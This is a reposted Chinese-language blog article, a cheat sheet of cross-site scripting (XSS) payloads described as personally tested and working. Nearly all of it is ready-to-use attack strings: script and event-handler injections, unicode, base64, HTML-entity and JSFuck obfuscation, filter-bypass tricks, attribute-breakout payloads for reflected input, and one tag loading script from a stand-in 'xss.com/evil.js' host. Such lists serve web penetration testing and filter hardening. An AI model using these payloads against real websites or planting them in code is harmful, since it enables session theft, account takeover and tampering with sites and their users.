碼上歡樂
相關內容    簡體    繁體

【命令匯總】XSS payload 速查表

本文轉載自   查看原文   2019-06-27 19:17   1007    漏洞學習

日期:2019-05-15 14:06:21
作者:Bay0net
介紹:收集並且可用的一些 XSS payload,網上的速查表很多,但是測試了下很多 payload 的不可用,這里都是自己能用的

0x01、 基本流程

先使用無害的標簽進行測試,比如<b>、<i>、<u>等,然后在測試是否過濾了 '、"、<>

0x02、可用的 payload

日常使用

<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm(1);</script>
<scRipT>alert(999999)</ScriPt>
<script src="http://xss.com/evil.js">
<script src=data:text/javascript,alert(1)></script>
<script>alert(String.fromCharCode(49,49))</script>
<script>setTimeout(alert(1),0)</script>

編碼相關

unicode

<script>\u0061\u006C\u0065\u0072\u0074(1)</script>

base64

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYmFzZTY0X2lmcmFtZScpPC9zY3JpcHQ+">

html 實體

<script src=&#100&#97&#116&#97:text/javascript,alert(1)></script>
<a href= 'javascript:alert&#40;&#39;123&#39;&#41; '>Hello</a>
<a href= "j&#97;vascript:alert&#40; '123' &#41;">Hello</a >
<a  href=  "j&#97;vascript:alert&#0000040;  '123' &#41;">Hello</a >
<a  href=  "j&#97vascript:alert&#0000040'123' &#41">Hello</a >
<input onfocus="&#97&#108&#101&#114&#116&#40&#39&#49&#39&#41" autofocus/>

eval 函數

<a  href="j&#97;vascript:eval('&#97;\x6c\x65\x72\x74\x28\x22\x31\x22\x29')">Hello</a>
<a  href="j&#97;vascript:eval('&#97;\u006C\x65\x72\x74\x28\x22\x31\x22\x29')">Hello</a>
<a  href="j&#97;vascript:eval('&#97;\154\x65\x72\x74\x28\x22\x31\x22\x29')">Hello</a>

SRC 屬性

<img src=x  onerror=prompt(1);>
<img/src=aaa.jpg  onerror=prompt(1);>
<video src=x  onerror=prompt(1);>
<audio src=x  onerror=prompt(1);>

<img src="#" onclick="javascript:alert('img:onclick')" onerror="javascript:alert('img:onerror')" onload="javascript:alert('img:onload')">
<video src="#" onclick="javascript:alert('video:onclick')" onerror="javascript:alert('video:onerror')" onload="javascript:alert('video:onload')"></video>
<audio src="#" onclick="javascript:alert('audio:onclick')" onerror="javascript:alert('audio:onerror')" onload="javascript:alert('audio:onload')"></audio>

img、video、audio 標簽
onclick: 點擊觸發
onerror: 當 src 加載不出來時觸發
onload: 當 src 加載完畢觸發

iframe

<iframe src="javascript:alert(2)">
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<iframe/onload=alert(document.domain)></iframe>
<IFRAME SRC="javascript:alert(29);"></IFRAME>

過濾相關

過濾空格和括號
<svg><script>alert&#40/1/&#41</script>
( is html encoded to &#40
) is html encoded to &#41

過濾括號
<input onfocus="alert`1`" autofocus/>

過濾了<script>的話
<scr<script>ipt>alert(1)</scr<script>ipt>;

其他標簽

embed
<embed/src=//www.baidu.com>

form
<form action="Javascript:alert(1)"><input type=submit value="click me">
<form><button formaction=javascript&colon;alert(1)>CLICKME
<form/action=javascript:alert(22)><input/type=submit>
<form onsubmit=alert(23)><button>M

object
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object>

anytag
<anytag onmouseover=alert(15)>M
<anytag onclick=alert(16)>click

a 標簽
<a href="http://www.google.com">Clickme</a>
<a href="javascript:alert(1)">Clickme</a>
<a onmouseover=alert(17)>1
<a href=javascript:alert(19)>123

button 標簽
<button/onclick=alert(20)>

input 標簽
<input onfocus=alert(33) autofocus>
<input onblur=alert(34) autofocus><input autofocus>

body
<body/onhashchange=alert(1)><a href=#>clickit
<body/onload=alert(25)>
<body onload=prompt(1);>

svg 標簽
<svg/onload=prompt(1);>

事件處理

可用的事件

onResume
onReverse
onSeek
onSynchRestored
onURLFlip
onRepeat
onPause
onstop
onmouseover

具體的 payload

<body onload=prompt(1);>
<body onload= "javascript:alert('body')"></body>
<svg onload=" javascript:alert('svg')"></svg >
<a onmouseover= "javascript:alert('a_onmouseover')">12</ a>
<select autofocus onfocus=alert(1)>
<select autofocus onfocus="javascript:alert('select' )"></select>
<textarea autofocus onfocus=alert(1)>
<textarea autofocus onfocus="javascript:alert('textarea' )"></textarea>
<keygen autofocus onfocus=alert(1)>
<keygen autofocus onfocus="javascript:alert('keygen' )"></keygen>
<video><source onerror="javascript:alert(1)">
<audio><source onerror="javascript:alert('source')"></ audio>

meta
<meta http-equiv="refresh"  content="0;url=//baidu.com">

JSFuck

<img src=x onerror=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()>

0x03、特定情況

基於反射

代碼:<input value="XSStest" type=text>
其中的 XSStest,可以使用以下 payload

" onmouseover=alert(0) x="
" onfocusin=alert(1)     autofocus x="
" onfocusout=alert(1)     autofocus x="
" onblur=alert(1) autofocus     a="

服務器過濾說明

一般都過濾成這個樣子

小於號這樣寫:&lt; 或 &#60;
大於號這樣寫:&gt; 或 &#62;

0x04、XSSgame

XSS Game


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 GNU Emacs命令速查表 Metasploit工具Meterpreter的命令速查表 博通交換SDK命令速查表 OpenStack 命令行速查表 能當壁紙用的Git常用命令速查表 ***Git 常用命令速查表(圖文+表格) Oracle注入速查表 CSS屬性速查表 IntraWeb XIV 類型速查表 哈希算法-快速查表的原理
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM